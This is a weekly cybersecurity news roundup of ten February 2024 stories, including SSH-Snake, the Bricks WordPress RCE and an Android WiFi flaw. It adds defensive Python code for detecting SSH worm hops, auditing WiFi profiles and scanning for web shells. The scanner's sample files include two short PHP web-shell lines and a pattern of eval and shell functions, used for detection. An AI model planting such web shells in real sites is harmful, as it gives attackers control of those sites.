Welcome to the Cyber Watch series for today, February 23, 2024. At DigitalXForce, our Cyber Intelligence team curates a list of the latest cybersecurity news to keep you informed of stories that matter every week.
This week’s Cyber Watch top 10 list is a compilation of stories from 50+ relevant news sources across the web – all ranked according to the risk impact. We encourage you to review these stories and take steps to protect your organization. Click on each headline to read the full story.
FTC Fines Avast $16.5M Over Deceptive Data Privacy Practices
The U.S. Federal Trade Commission has cracked down on popular antivirus provider Avast for deceiving users about its data privacy protections. The FTC levied a $16.5 million fine against Avast for selling users’ sensitive browsing histories to advertisers through its Jumpshot subsidiary, despite claiming its software blocked online tracking.
The regulatory body accused Avast of unfairly collecting and selling users’ web searches, locations, and other personal information without proper consent. Avast also failed to disclose that data buyers could associate the browsing data with additional information to track users. The deceptive practices came to light in 2020 after investigations revealed Avast was supplying data to over 100 third parties.
Major browser vendors had already pulled Avast’s extensions from their stores in late 2019 after researchers showed them harvesting browsing data. The FTC order now bans Avast from selling or licensing browsing data for advertising purposes and requires it to notify affected users. The violations allegedly ran from 2014 onwards, with Jumpshot at one point claiming access to data from 100 million devices. Avast shut Jumpshot down in early 2020 following the backlash.
Wyze Cameras Expose Users’ Feeds in Repeat Privacy Breach
Affordable home security camera maker Wyze is facing backlash after a technical glitch exposed customers’ private camera feeds to other users for the second time in five months. Last Friday, a Wyze outage caused by an AWS partner issue led to around 13,000 users receiving incorrect camera thumbnails and clips when service was restored.
Wyze said a third-party caching client library had mixed up device and user ID mappings, so roughly 1,500 of those customers were able to open full event videos recorded by strangers’ cameras. The company immediately disabled the Events tab and added an extra verification step before users can view event videos. The incident echoes one last September, when a caching error left 2,300 users’ feeds viewable by others for about 40 minutes.
Wyze had claimed to fix the problems, but customers are frustrated by the repeated failures. Some have already raised concerns over Wyze’s handling of previously disclosed security vulnerabilities. The two breaches within months have severely damaged trust in Wyze’s ability to safeguard sensitive customer footage.
Healthcare Vendor Hack Exposes Data of 2.4 Million Patients
A major healthcare data breach has impacted nearly 2.4 million patients after hackers infiltrated the network of Medical Management Resource Group, an Arizona-based administrative services provider for ophthalmology practices. The November cyberattack against MMRG, which does business as American Vision Partners, involved the theft of sensitive patient information including names, contact details, birthdates, medical records, and social security numbers.
MMRG works with about a dozen eye care practices across multiple states. This incident underscores the data security risks posed when third-party vendors like MMRG get breached, potentially exposing millions of patients. In 2022, around 40% of major health data breaches involved hacked business associates like medical transcription services and billing companies.
The MMRG hack again highlights the need for healthcare entities to vet vendor cybersecurity controls and risk management.
UK’s NCA Exposes Nearly 200 LockBit Ransomware Affiliates
In the latest revelation following the takedown of the LockBit ransomware gang, authorities have exposed close to 200 of the group’s criminal affiliates. Data taken from LockBit’s own affiliate portal shows 187 affiliate accounts registered between January 2022 and February 2024.
These affiliates bought into LockBit’s ransomware-as-a-service model, deploying its malware against victims in exchange for a share of the extorted payments. Law enforcement agencies led by the UK’s National Crime Agency have been steadily releasing insider information since compromising LockBit’s infrastructure this week.
The authorities had already disclosed that they obtained LockBit’s source code, along with details of StealBit, its custom data-exfiltration tool. Exposing nearly 200 affiliates deals a further blow by identifying more of the individuals behind the syndicate’s global ransomware operations.
Officials have warned the named affiliates that they are being watched and may face legal action. The NCA also replaced LockBit’s affiliate panel with a message telling affiliates that authorities now hold data on their attacks, their victims and the money they extorted. The coordinated, worldwide operation aims to dismantle LockBit’s infrastructure and deter those who worked with it.
Hackers Deploy Open Source SSH Worm Tool Against 100 Orgs
A recently released open-source penetration-testing tool called SSH-Snake is being used by attackers to spread through the networks of more than 100 organizations. Security firm Sysdig reports that threat actors are deploying SSH-Snake, which behaves like a worm, to harvest SSH credentials and move laterally after gaining initial access through Confluence vulnerabilities.
SSH-Snake is a bash script designed to map the SSH trust relationships in a network. On each host it reaches, it collects private keys, known_hosts entries, bash history and SSH configuration to work out where those keys can log in, then uses them to connect to the next host and runs itself again there, so it is effectively self-replicating. Sysdig found a command-and-control server on which the attackers had collected credentials, IP addresses and bash histories from more than 100 victims.
SSH-Snake is harder to spot than typical SSH malware because it avoids the fixed, scripted patterns that signatures key on: it runs from memory rather than dropping files and adapts to whatever it finds on each host. Although intended for authorized testing, that stealth and its reliability in reaching deep into a breached network make it attractive to criminals.
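Detection logic for the propagation pattern described above, as an added example that is not Sysdig’s research code or SSH-Snake itself. It assumes sshd logs from several hosts are collected centrally in the standard "Accepted publickey" syslog format and that a lookup from IP address to host name exists; the sample lines, host names and addresses are constructed. The idea is that a single SSH login is routine, but a host that receives a key-based login and within minutes makes its own key-based login to a new host, which then does the same, is the signature of a worm walking the trust graph.

```python
"""Detect worm-like SSH hop chains of the kind SSH-Snake produces.

Added example, not Sysdig's or SSH-Snake's code. Log lines, host names
and addresses below are constructed; the line format is sshd's standard
"Accepted publickey" syslog message.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: sshd lines from several hosts, as a central syslog would hold them.
SAMPLE_LOG = """\
Feb 20 09:12:01 web01 sshd[2210]: Accepted publickey for admin from 10.0.0.5 port 50122 ssh2: ED25519 SHA256:AdminKey
Feb 20 10:01:05 web01 sshd[2311]: Accepted publickey for deploy from 10.0.0.5 port 51022 ssh2: RSA SHA256:KeyA
Feb 20 10:01:40 db01 sshd[880]: Accepted publickey for deploy from 10.0.1.10 port 40310 ssh2: RSA SHA256:KeyB
Feb 20 10:02:15 build01 sshd[4102]: Accepted publickey for root from 10.0.2.20 port 38870 ssh2: RSA SHA256:KeyC
Feb 20 15:45:09 db01 sshd[951]: Accepted publickey for deploy from 10.0.1.10 port 40999 ssh2: RSA SHA256:KeyB
"""

# Constructed: which host owns which address, so the source of a login seen
# on one host can be matched to that host's own inbound logins.
HOST_BY_IP = {"10.0.0.5": "bastion", "10.0.1.10": "web01",
              "10.0.2.20": "db01", "10.0.3.30": "build01"}

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted publickey for (?P<user>\S+) from (?P<src>[\d.]+) port \d+ "
    r"ssh2: \S+ (?P<fp>SHA256:\S+)$")


def parse_logins(text, year=2024):
    """Return accepted public-key logins, oldest first.

    Syslog timestamps carry no year, so one is assumed (2024 here).
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # failures, disconnects and password logins are not hops
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append({"time": ts, "dst": m["host"], "user": m["user"],
                       "src": HOST_BY_IP.get(m["src"], m["src"]),
                       "fp": m["fp"]})
    return sorted(events, key=lambda e: e["time"])


def find_hop_chains(events, window=timedelta(minutes=5), min_hops=2):
    """Chain each login to the most recent inbound login on its source host.

    A chain [A, B, C] means A logged into B and then B logged into C within
    `window`. Single hops are normal administration; only chains with at
    least `min_hops` edges are reported, and prefixes of longer chains are
    dropped so each propagation path is listed once.
    """
    inbound = defaultdict(list)  # host -> [(time, chain ending at that host)]
    chains = []
    for e in events:
        best = None
        for t, chain in inbound[e["src"]]:
            age = e["time"] - t
            if timedelta(0) <= age <= window and e["dst"] not in chain:
                if best is None or t > best[0]:
                    best = (t, chain)
        chain = (best[1] if best else [e["src"]]) + [e["dst"]]
        inbound[e["dst"]].append((e["time"], chain))
        if len(chain) - 1 >= min_hops:
            chains.append(chain)
    return [c for c in chains
            if not any(o != c and o[:len(c)] == c for o in chains)]


if __name__ == "__main__":
    for path in find_hop_chains(parse_logins(SAMPLE_LOG)):
        print(" -> ".join(path))
```

On the constructed log this reports one path, bastion -> web01 -> db01 -> build01, while the afternoon login from web01 to db01 is ignored because nothing logged into web01 shortly before it. The window and hop threshold are the tuning knobs: a five-minute window with two hops catches an automated crawl without flagging an administrator who jumps through a bastion.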
Billions of Android Users Face WiFi Hotspot Hacking Risk
A newly disclosed WiFi vulnerability reportedly affecting over 2 billion Android devices lets an attacker stand up a fake copy of a trusted enterprise WiFi network and intercept the victim’s traffic. The flaw lies in the PEAP handling of wpa_supplicant, the open-source software that Android and most Linux systems use to authenticate to WiFi networks. If a saved WPA-Enterprise profile does not verify the authentication server’s certificate, the device will connect to an attacker’s clone of that network as if it were the real one.
The attacker only needs the network’s name, which can be collected by walking around an office building and scanning for it. A second flaw, in Intel’s iwd WiFi daemon for Linux, affects iwd when it runs as an access point, for example for a home network: an attacker can skip steps of the WPA handshake and join the protected network without knowing its password, then go after the devices and data on it.
Both issues are fixed upstream, but Android users depend on their device vendor to ship the patch. As a stopgap, experts urge users to manually configure each saved enterprise network with the CA certificate of its authentication server and the server’s domain name, so that the device refuses to connect to an impostor.
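An added example, not from the researchers or the wpa_supplicant project, of what the stopgap looks like in practice and how to audit for it. It is written against the Linux wpa_supplicant.conf format, since Android exposes the same settings only through its WiFi UI; the option names (key_mgmt, ca_cert, domain_suffix_match) are real wpa_supplicant parameters, while the configuration text, SSIDs, credentials and certificate path are constructed. It contains a PEAP profile with no server verification, the same profile hardened with a pinned CA certificate and server name, and a WPA-PSK home network that the check deliberately ignores.

```python
"""Audit wpa_supplicant profiles for enterprise networks that skip server checks.

Added example, not the wpa_supplicant project's code. The config text is
constructed; the option names (key_mgmt, ca_cert, domain_suffix_match, ...)
are real wpa_supplicant.conf parameters.
"""
import re

SAMPLE_CONF = """\
ctrl_interface=/run/wpa_supplicant
update_config=1

# Weak: PEAP with no CA certificate, so any AP announcing this SSID is accepted.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

# Hardened: pin the RADIUS server's CA and require its name to match.
network={
    ssid="CorpWiFi-Hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}

# Not enterprise: a pre-shared-key home network, which the audit skips.
network={
    ssid="HomeNet"
    key_mgmt=WPA-PSK
    psk="correct horse battery staple"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
SERVER_NAME_KEYS = ("domain_suffix_match", "domain_match",
                    "altsubject_match", "subject_match")


def parse_networks(text):
    """Return one dict of parameters per network={...} block."""
    networks = []
    for body in BLOCK_RE.findall(text):
        params = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip().strip('"')
        networks.append(params)
    return networks


def audit_enterprise_networks(text):
    """Map each 802.1X/EAP profile's SSID to a list of weaknesses (empty = ok)."""
    findings = {}
    for net in parse_networks(text):
        key_mgmt = net.get("key_mgmt", "")
        if "WPA-EAP" not in key_mgmt and "IEEE8021X" not in key_mgmt:
            continue  # PSK, SAE or open networks are not affected by this flaw
        problems = []
        if not net.get("ca_cert") and not net.get("ca_path"):
            problems.append("no ca_cert/ca_path: the authentication server's "
                            "certificate is never verified, so a clone AP is accepted")
        if not any(net.get(k) for k in SERVER_NAME_KEYS):
            problems.append("no domain_suffix_match or similar: any certificate "
                            "issued by the trusted CA would be accepted")
        findings[net.get("ssid", "<no ssid>")] = problems
    return findings


if __name__ == "__main__":
    for ssid, problems in audit_enterprise_networks(SAMPLE_CONF).items():
        print(ssid + ":", "OK" if not problems else "; ".join(problems))
```

Both checks matter: a pinned CA without a name match still accepts any server that holds a certificate from that CA, and a name match without a CA is not enforced at all. On Android the equivalent is setting "CA certificate" and "Domain" on each saved enterprise network rather than leaving them at "Do not validate".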
Critical WordPress Theme RCE Flaw Puts 25,000 Sites at Risk
A critical vulnerability, tracked as CVE-2024-25600, has been found in the popular Bricks Builder WordPress theme, which is used on over 25,000 websites. It allows unauthenticated remote code execution and is rated 9.8 out of 10 in severity. Security researcher ‘snicco’ discovered the issue and disclosed it responsibly through Patchstack’s bug bounty program.
Within days of the fix being released, exploitation attempts were detected from several IP addresses. All Bricks Builder versions before 1.9.6.1 are affected. The root cause is that user-controlled input reached a PHP eval() call through an endpoint guarded only by a nonce that any visitor can read from the site’s pages, so an attacker can inject arbitrary PHP and take over the entire site. The theme’s ease of use made it popular with developers, and that same popularity now makes it an attractive target.
Site owners are urged to update immediately. The Bricks team responded quickly with version 1.9.6.1, which removes the root cause, but patching does not evict an attacker who already got in: sites that were exposed should check for web shells, unexpected administrator accounts and modified files. The flaw is a reminder of the risk that third-party themes and plugins add to a site’s supply chain.
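A post-patch check of the kind recommended above, as an added example that is not Bricks’, Patchstack’s or WordPress code. It hunts for two classic leftovers of a PHP code-injection compromise: PHP files under wp-content/uploads, where WordPress only ever stores media, and PHP files modified at or after the suspected exploitation window that call eval() or shell functions. The directory tree it scans is constructed in a temporary directory, and its file names are illustrative rather than artefacts of any real attack; on a real site, point it at the WordPress root with the timestamp of the first exploitation attempt.

```python
"""Hunt for web shells left behind after a WordPress code-injection flaw.

Added example; not Bricks', Patchstack's or WordPress code. The sample site
written by build_sample_site() is constructed for the demo; its file names
are illustrative, not artefacts of any real attack.
"""
import os
import re
import tempfile
import time

# Calls a web shell needs that theme and plugin code rarely makes. A hit is a
# lead to inspect by hand, not a verdict.
SUSPICIOUS_CALL = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(",
    re.I)
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".php7", ".phar")


def scan_wordpress_tree(root, since_epoch):
    """Return sorted (relative_path, reason) pairs worth a closer look.

    Signal 1: any PHP file under wp-content/uploads (WordPress only stores
    media there, so PHP in that tree is almost always planted).
    Signal 2: a PHP file modified at or after `since_epoch` that calls
    eval/shell-style functions, which also catches edited core or theme files.
    """
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "php file in uploads"))
                continue
            if os.path.getmtime(path) >= since_epoch:
                with open(path, "r", errors="replace") as fh:
                    if SUSPICIOUS_CALL.search(fh.read()):
                        findings.append((rel, "modified after compromise window, "
                                              "calls eval/shell function"))
    return sorted(findings)


def build_sample_site(root, compromise_epoch):
    """Write a constructed WordPress tree: clean files dated before the
    compromise and two planted artefacts dated after it."""
    files = {
        "wp-includes/functions.php": "<?php function wp_ok() { return 1; }",
        "wp-content/themes/bricks/includes/query.php":
            "<?php /* patched theme file */ return 0;",
        "wp-content/uploads/2024/02/image.jpg.php":
            "<?php eval(base64_decode($_POST['c']));",
        "wp-content/themes/bricks/cache.php":
            "<?php if (isset($_REQUEST['x'])) { system($_REQUEST['x']); }",
    }
    planted = {"wp-content/uploads/2024/02/image.jpg.php",
               "wp-content/themes/bricks/cache.php"}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        stamp = compromise_epoch + 3600 if rel in planted else compromise_epoch - 86400
        os.utime(path, (stamp, stamp))


def demo():
    """Build the sample site in a temp dir, scan it, and return the findings."""
    compromise = time.time() - 7 * 86400  # assume exposure began a week ago
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root, compromise)
        return scan_wordpress_tree(root, compromise)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Modification time is a weak signal on its own, since attackers can reset it with touch, so pair this with a comparison of theme and core files against clean copies of the same version and a review of wp_users for accounts you did not create.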
OWASP Releases Guide to Securely Implement AI Tools
The Open Web Application Security Project (OWASP) has published a checklist to help organizations safely leverage large language models (LLMs). As the adoption of AI accelerates, the 32-page document aids chief information security officers in governance and risk mitigation. It outlines a framework for secure AI deployment, from reviewing resilience strategies to choosing the right solutions.
Author Sandy Dunn says generative AI requires a completely different security mindset to address the asymmetric warfare of vastly broad attack surfaces. The guide covers business, risk management, and policy measures holistically while keeping legal details high-level.
Steps include threat modeling, monitoring risks, validation processes, and specialized security training. OWASP plans further work on an AI collaboration hub and standards alignment. Overall, the resource represents a milestone in coalescing guidance, says OWASP’s John Sotiropoulos.
Hackers Impersonate SendGrid Email Provider to Target SMBs
Cybercriminals are abusing the trust placed in the email delivery service SendGrid to craft convincing phishing scams against small businesses, Kaspersky researchers warn. By hijacking SendGrid clients’ mailing lists, the attackers send fraudulent messages through SendGrid itself, so the mail appears to come from the legitimate provider. The scam urges recipients to “enhance security” by enabling two-factor authentication and redirects them to a fake login page that steals their credentials.
The attack is especially insidious because the messages are sent through SendGrid’s real infrastructure: they come from a trusted source, sender-authentication checks pass, and traditional filters have little to flag. Kaspersky’s Roman Dedenok explains that scammers learn to mimic reliable services, which makes proper email validation and layered security controls essential.
The report notes that phishers prefer to compromise older, established accounts that have already sent bulk mail, because their reputation is trusted. Kaspersky advises staff training, anti-phishing protection and endpoint security to reduce the risk of such account-takeover attacks.
US Issues Guidance on Securing Water Systems from Cyber Threats
The US government has released guidance detailing actions water and wastewater entities should take to boost resilience against escalating cyber risks. The recommendations aim to help secure critical infrastructure like treatment facilities from potentially devastating attacks.
Key measures include reducing internet exposure of operational tech, regularly assessing vulnerabilities, improving password practices, inventorying exposed assets, timely patching prioritizing known exploited bugs, and conducting cyber awareness training. Additional steps advise regular backups stored offline, removal of default passwords, and multi-factor authentication implementation. The guidance highlights utilizing free resources like CISA’s specialized vulnerability scanner for water utilities.
The urgent call to action comes as cyber threats loom over essential water systems impacting public health and safety. Sophisticated ransomware and nation-state groups increasingly target the sector’s industrial control systems. Implementing baseline security hygiene like the recommended actions is critical for water companies to avoid disruptive incidents. The guidance was jointly published by CISA, EPA, and FBI to help utilities and local governments improve cyber resilience.
That’s all for today. Stay tuned for our next episode. See you next week!